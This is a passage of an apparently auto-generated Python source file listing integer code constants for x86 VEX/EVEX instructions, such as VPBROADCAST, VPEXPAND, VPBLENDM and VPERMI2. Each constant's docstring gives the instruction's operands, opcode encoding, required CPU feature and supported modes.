``EVEX.512.66.0F38.W0 58 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPBROADCASTQ_XMM_XMMM64: int = 3105
"""
``VPBROADCASTQ xmm1, xmm2/m64``
``VEX.128.66.0F38.W0 59 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPBROADCASTQ_YMM_XMMM64: int = 3106
"""
``VPBROADCASTQ ymm1, xmm2/m64``
``VEX.256.66.0F38.W0 59 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VBROADCASTI32X2_XMM_K1Z_XMMM64: int = 3107
"""
``VBROADCASTI32X2 xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.W0 59 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTI32X2_YMM_K1Z_XMMM64: int = 3108
"""
``VBROADCASTI32X2 ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.W0 59 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTI32X2_ZMM_K1Z_XMMM64: int = 3109
"""
``VBROADCASTI32X2 zmm1 {k1}{z}, xmm2/m64``
``EVEX.512.66.0F38.W0 59 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPBROADCASTQ_XMM_K1Z_XMMM64: int = 3110
"""
``VPBROADCASTQ xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.W1 59 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTQ_YMM_K1Z_XMMM64: int = 3111
"""
``VPBROADCASTQ ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.W1 59 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTQ_ZMM_K1Z_XMMM64: int = 3112
"""
``VPBROADCASTQ zmm1 {k1}{z}, xmm2/m64``
``EVEX.512.66.0F38.W1 59 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VBROADCASTI128_YMM_M128: int = 3113
"""
``VBROADCASTI128 ymm1, m128``
``VEX.256.66.0F38.W0 5A /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VBROADCASTI32X4_YMM_K1Z_M128: int = 3114
"""
``VBROADCASTI32X4 ymm1 {k1}{z}, m128``
``EVEX.256.66.0F38.W0 5A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTI32X4_ZMM_K1Z_M128: int = 3115
"""
``VBROADCASTI32X4 zmm1 {k1}{z}, m128``
``EVEX.512.66.0F38.W0 5A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTI64X2_YMM_K1Z_M128: int = 3116
"""
``VBROADCASTI64X2 ymm1 {k1}{z}, m128``
``EVEX.256.66.0F38.W1 5A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTI64X2_ZMM_K1Z_M128: int = 3117
"""
``VBROADCASTI64X2 zmm1 {k1}{z}, m128``
``EVEX.512.66.0F38.W1 5A /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTI32X8_ZMM_K1Z_M256: int = 3118
"""
``VBROADCASTI32X8 zmm1 {k1}{z}, m256``
``EVEX.512.66.0F38.W0 5B /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTI64X4_ZMM_K1Z_M256: int = 3119
"""
``VBROADCASTI64X4 zmm1 {k1}{z}, m256``
``EVEX.512.66.0F38.W1 5B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDB_XMM_K1Z_XMMM128: int = 3120
"""
``VPEXPANDB xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W0 62 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPEXPANDB_YMM_K1Z_YMMM256: int = 3121
"""
``VPEXPANDB ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W0 62 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPEXPANDB_ZMM_K1Z_ZMMM512: int = 3122
"""
``VPEXPANDB zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W0 62 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPEXPANDW_XMM_K1Z_XMMM128: int = 3123
"""
``VPEXPANDW xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W1 62 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPEXPANDW_YMM_K1Z_YMMM256: int = 3124
"""
``VPEXPANDW ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W1 62 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPEXPANDW_ZMM_K1Z_ZMMM512: int = 3125
"""
``VPEXPANDW zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W1 62 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSB_XMMM128_K1Z_XMM: int = 3126
"""
``VPCOMPRESSB xmm1/m128 {k1}{z}, xmm2``
``EVEX.128.66.0F38.W0 63 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSB_YMMM256_K1Z_YMM: int = 3127
"""
``VPCOMPRESSB ymm1/m256 {k1}{z}, ymm2``
``EVEX.256.66.0F38.W0 63 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSB_ZMMM512_K1Z_ZMM: int = 3128
"""
``VPCOMPRESSB zmm1/m512 {k1}{z}, zmm2``
``EVEX.512.66.0F38.W0 63 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSW_XMMM128_K1Z_XMM: int = 3129
"""
``VPCOMPRESSW xmm1/m128 {k1}{z}, xmm2``
``EVEX.128.66.0F38.W1 63 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSW_YMMM256_K1Z_YMM: int = 3130
"""
``VPCOMPRESSW ymm1/m256 {k1}{z}, ymm2``
``EVEX.256.66.0F38.W1 63 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSW_ZMMM512_K1Z_ZMM: int = 3131
"""
``VPCOMPRESSW zmm1/m512 {k1}{z}, zmm2``
``EVEX.512.66.0F38.W1 63 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPBLENDMD_XMM_K1Z_XMM_XMMM128B32: int = 3132
"""
``VPBLENDMD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 64 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBLENDMD_YMM_K1Z_YMM_YMMM256B32: int = 3133
"""
``VPBLENDMD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 64 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBLENDMD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3134
"""
``VPBLENDMD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 64 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPBLENDMQ_XMM_K1Z_XMM_XMMM128B64: int = 3135
"""
``VPBLENDMQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 64 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBLENDMQ_YMM_K1Z_YMM_YMMM256B64: int = 3136
"""
``VPBLENDMQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 64 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBLENDMQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3137
"""
``VPBLENDMQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 64 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VBLENDMPS_XMM_K1Z_XMM_XMMM128B32: int = 3138
"""
``VBLENDMPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 65 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBLENDMPS_YMM_K1Z_YMM_YMMM256B32: int = 3139
"""
``VBLENDMPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 65 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBLENDMPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3140
"""
``VBLENDMPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 65 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VBLENDMPD_XMM_K1Z_XMM_XMMM128B64: int = 3141
"""
``VBLENDMPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 65 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBLENDMPD_YMM_K1Z_YMM_YMMM256B64: int = 3142
"""
``VBLENDMPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 65 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBLENDMPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 3143
"""
``VBLENDMPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 65 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPBLENDMB_XMM_K1Z_XMM_XMMM128: int = 3144
"""
``VPBLENDMB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 66 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBLENDMB_YMM_K1Z_YMM_YMMM256: int = 3145
"""
``VPBLENDMB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 66 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBLENDMB_ZMM_K1Z_ZMM_ZMMM512: int = 3146
"""
``VPBLENDMB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 66 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBLENDMW_XMM_K1Z_XMM_XMMM128: int = 3147
"""
``VPBLENDMW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 66 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBLENDMW_YMM_K1Z_YMM_YMMM256: int = 3148
"""
``VPBLENDMW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 66 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBLENDMW_ZMM_K1Z_ZMM_ZMMM512: int = 3149
"""
``VPBLENDMW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 66 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VP2INTERSECTD_KP1_XMM_XMMM128B32: int = 3150
"""
``VP2INTERSECTD k1+1, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F2.0F38.W0 68 /r``
``AVX512VL and AVX512_VP2INTERSECT``
``16/32/64-bit``
"""
EVEX_VP2INTERSECTD_KP1_YMM_YMMM256B32: int = 3151
"""
``VP2INTERSECTD k1+1, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F2.0F38.W0 68 /r``
``AVX512VL and AVX512_VP2INTERSECT``
``16/32/64-bit``
"""
EVEX_VP2INTERSECTD_KP1_ZMM_ZMMM512B32: int = 3152
"""
``VP2INTERSECTD k1+1, zmm2, zmm3/m512/m32bcst``
``EVEX.512.F2.0F38.W0 68 /r``
``AVX512F and AVX512_VP2INTERSECT``
``16/32/64-bit``
"""
EVEX_VP2INTERSECTQ_KP1_XMM_XMMM128B64: int = 3153
"""
``VP2INTERSECTQ k1+1, xmm2, xmm3/m128/m64bcst``
``EVEX.128.F2.0F38.W1 68 /r``
``AVX512VL and AVX512_VP2INTERSECT``
``16/32/64-bit``
"""
EVEX_VP2INTERSECTQ_KP1_YMM_YMMM256B64: int = 3154
"""
``VP2INTERSECTQ k1+1, ymm2, ymm3/m256/m64bcst``
``EVEX.256.F2.0F38.W1 68 /r``
``AVX512VL and AVX512_VP2INTERSECT``
``16/32/64-bit``
"""
EVEX_VP2INTERSECTQ_KP1_ZMM_ZMMM512B64: int = 3155
"""
``VP2INTERSECTQ k1+1, zmm2, zmm3/m512/m64bcst``
``EVEX.512.F2.0F38.W1 68 /r``
``AVX512F and AVX512_VP2INTERSECT``
``16/32/64-bit``
"""
EVEX_VPSHLDVW_XMM_K1Z_XMM_XMMM128: int = 3156
"""
``VPSHLDVW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 70 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVW_YMM_K1Z_YMM_YMMM256: int = 3157
"""
``VPSHLDVW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 70 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVW_ZMM_K1Z_ZMM_ZMMM512: int = 3158
"""
``VPSHLDVW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 70 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVD_XMM_K1Z_XMM_XMMM128B32: int = 3159
"""
``VPSHLDVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 71 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVD_YMM_K1Z_YMM_YMMM256B32: int = 3160
"""
``VPSHLDVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 71 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3161
"""
``VPSHLDVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 71 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVQ_XMM_K1Z_XMM_XMMM128B64: int = 3162
"""
``VPSHLDVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 71 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVQ_YMM_K1Z_YMM_YMMM256B64: int = 3163
"""
``VPSHLDVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 71 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3164
"""
``VPSHLDVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 71 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVW_XMM_K1Z_XMM_XMMM128: int = 3165
"""
``VPSHRDVW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 72 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVW_YMM_K1Z_YMM_YMMM256: int = 3166
"""
``VPSHRDVW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 72 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVW_ZMM_K1Z_ZMM_ZMMM512: int = 3167
"""
``VPSHRDVW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 72 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VCVTNEPS2BF16_XMM_K1Z_XMMM128B32: int = 3168
"""
``VCVTNEPS2BF16 xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.F3.0F38.W0 72 /r``
``AVX512VL and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VCVTNEPS2BF16_XMM_K1Z_YMMM256B32: int = 3169
"""
``VCVTNEPS2BF16 xmm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.F3.0F38.W0 72 /r``
``AVX512VL and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VCVTNEPS2BF16_YMM_K1Z_ZMMM512B32: int = 3170
"""
``VCVTNEPS2BF16 ymm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.F3.0F38.W0 72 /r``
``AVX512F and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VCVTNE2PS2BF16_XMM_K1Z_XMM_XMMM128B32: int = 3171
"""
``VCVTNE2PS2BF16 xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F2.0F38.W0 72 /r``
``AVX512VL and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VCVTNE2PS2BF16_YMM_K1Z_YMM_YMMM256B32: int = 3172
"""
``VCVTNE2PS2BF16 ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F2.0F38.W0 72 /r``
``AVX512VL and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VCVTNE2PS2BF16_ZMM_K1Z_ZMM_ZMMM512B32: int = 3173
"""
``VCVTNE2PS2BF16 zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.F2.0F38.W0 72 /r``
``AVX512F and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VPSHRDVD_XMM_K1Z_XMM_XMMM128B32: int = 3174
"""
``VPSHRDVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 73 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVD_YMM_K1Z_YMM_YMMM256B32: int = 3175
"""
``VPSHRDVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 73 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3176
"""
``VPSHRDVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 73 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVQ_XMM_K1Z_XMM_XMMM128B64: int = 3177
"""
``VPSHRDVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 73 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVQ_YMM_K1Z_YMM_YMMM256B64: int = 3178
"""
``VPSHRDVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 73 /r``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3179
"""
``VPSHRDVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 73 /r``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPERMI2B_XMM_K1Z_XMM_XMMM128: int = 3180
"""
``VPERMI2B xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 75 /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMI2B_YMM_K1Z_YMM_YMMM256: int = 3181
"""
``VPERMI2B ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 75 /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMI2B_ZMM_K1Z_ZMM_ZMMM512: int = 3182
"""
``VPERMI2B zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 75 /r``
``AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMI2W_XMM_K1Z_XMM_XMMM128: int = 3183
"""
``VPERMI2W xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 75 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMI2W_YMM_K1Z_YMM_YMMM256: int = 3184
"""
``VPERMI2W ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 75 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMI2W_ZMM_K1Z_ZMM_ZMMM512: int = 3185
"""
``VPERMI2W zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 75 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMI2D_XMM_K1Z_XMM_XMMM128B32: int = 3186
"""
``VPERMI2D xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 76 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2D_YMM_K1Z_YMM_YMMM256B32: int = 3187
"""
``VPERMI2D ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 76 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2D_ZMM_K1Z_ZMM_ZMMM512B32: int = 3188
"""
``VPERMI2D zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 76 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2Q_XMM_K1Z_XMM_XMMM128B64: int = 3189
"""
``VPERMI2Q xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 76 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2Q_YMM_K1Z_YMM_YMMM256B64: int = 3190
"""
``VPERMI2Q ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 76 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2Q_ZMM_K1Z_ZMM_ZMMM512B64: int = 3191
"""
``VPERMI2Q zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 76 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2PS_XMM_K1Z_XMM_XMMM128B32: int = 3192
"""
``VPERMI2PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 77 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2PS_YMM_K1Z_YMM_YMMM256B32: int = 3193
"""
``VPERMI2PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 77 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2PS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3194
"""
``VPERMI2PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 77 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2PD_XMM_K1Z_XMM_XMMM128B64: int = 3195
"""
``VPERMI2PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 77 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2PD_YMM_K1Z_YMM_YMMM256B64: int = 3196
"""
``VPERMI2PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 77 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2PD_ZMM_K1Z_ZMM_ZMMM512B64: int = 3197
"""
``VPERMI2PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 77 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPBROADCASTB_XMM_XMMM8: int = 3198
"""
``VPBROADCASTB xmm1, xmm2/m8``
``VEX.128.66.0F38.W0 78 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPBROADCASTB_YMM_XMMM8: int = 3199
"""
``VPBROADCASTB ymm1, xmm2/m8``
``VEX.256.66.0F38.W0 78 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPBROADCASTB_XMM_K1Z_XMMM8: int = 3200
"""
``VPBROADCASTB xmm1 {k1}{z}, xmm2/m8``
``EVEX.128.66.0F38.W0 78 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTB_YMM_K1Z_XMMM8: int = 3201
"""
``VPBROADCASTB ymm1 {k1}{z}, xmm2/m8``
``EVEX.256.66.0F38.W0 78 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTB_ZMM_K1Z_XMMM8: int = 3202
"""
``VPBROADCASTB zmm1 {k1}{z}, xmm2/m8``
``EVEX.512.66.0F38.W0 78 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_VPBROADCASTW_XMM_XMMM16: int = 3203
"""
``VPBROADCASTW xmm1, xmm2/m16``
``VEX.128.66.0F38.W0 79 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPBROADCASTW_YMM_XMMM16: int = 3204
"""
``VPBROADCASTW ymm1, xmm2/m16``
``VEX.256.66.0F38.W0 79 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPBROADCASTW_XMM_K1Z_XMMM16: int = 3205
"""
``VPBROADCASTW xmm1 {k1}{z}, xmm2/m16``
``EVEX.128.66.0F38.W0 79 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTW_YMM_K1Z_XMMM16: int = 3206
"""
``VPBROADCASTW ymm1 {k1}{z}, xmm2/m16``
``EVEX.256.66.0F38.W0 79 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTW_ZMM_K1Z_XMMM16: int = 3207
"""
``VPBROADCASTW zmm1 {k1}{z}, xmm2/m16``
``EVEX.512.66.0F38.W0 79 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTB_XMM_K1Z_R32: int = 3208
"""
``VPBROADCASTB xmm1 {k1}{z}, r32``
``EVEX.128.66.0F38.W0 7A /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTB_YMM_K1Z_R32: int = 3209
"""
``VPBROADCASTB ymm1 {k1}{z}, r32``
``EVEX.256.66.0F38.W0 7A /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTB_ZMM_K1Z_R32: int = 3210
"""
``VPBROADCASTB zmm1 {k1}{z}, r32``
``EVEX.512.66.0F38.W0 7A /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTW_XMM_K1Z_R32: int = 3211
"""
``VPBROADCASTW xmm1 {k1}{z}, r32``
``EVEX.128.66.0F38.W0 7B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTW_YMM_K1Z_R32: int = 3212
"""
``VPBROADCASTW ymm1 {k1}{z}, r32``
``EVEX.256.66.0F38.W0 7B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTW_ZMM_K1Z_R32: int = 3213
"""
``VPBROADCASTW zmm1 {k1}{z}, r32``
``EVEX.512.66.0F38.W0 7B /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTD_XMM_K1Z_R32: int = 3214
"""
``VPBROADCASTD xmm1 {k1}{z}, r32``
``EVEX.128.66.0F38.W0 7C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTD_YMM_K1Z_R32: int = 3215
"""
``VPBROADCASTD ymm1 {k1}{z}, r32``
``EVEX.256.66.0F38.W0 7C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTD_ZMM_K1Z_R32: int = 3216
"""
``VPBROADCASTD zmm1 {k1}{z}, r32``
``EVEX.512.66.0F38.W0 7C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTQ_XMM_K1Z_R64: int = 3217
"""
``VPBROADCASTQ xmm1 {k1}{z}, r64``
``EVEX.128.66.0F38.W1 7C /r``
``AVX512VL and AVX512F``
``64-bit``
"""
EVEX_VPBROADCASTQ_YMM_K1Z_R64: int = 3218
"""
``VPBROADCASTQ ymm1 {k1}{z}, r64``
``EVEX.256.66.0F38.W1 7C /r``
``AVX512VL and AVX512F``
``64-bit``
"""
EVEX_VPBROADCASTQ_ZMM_K1Z_R64: int = 3219
"""
``VPBROADCASTQ zmm1 {k1}{z}, r64``
``EVEX.512.66.0F38.W1 7C /r``
``AVX512F``
``64-bit``
"""
EVEX_VPERMT2B_XMM_K1Z_XMM_XMMM128: int = 3220
"""
``VPERMT2B xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 7D /r``
``AVX512VL and AVX512_VBMI``
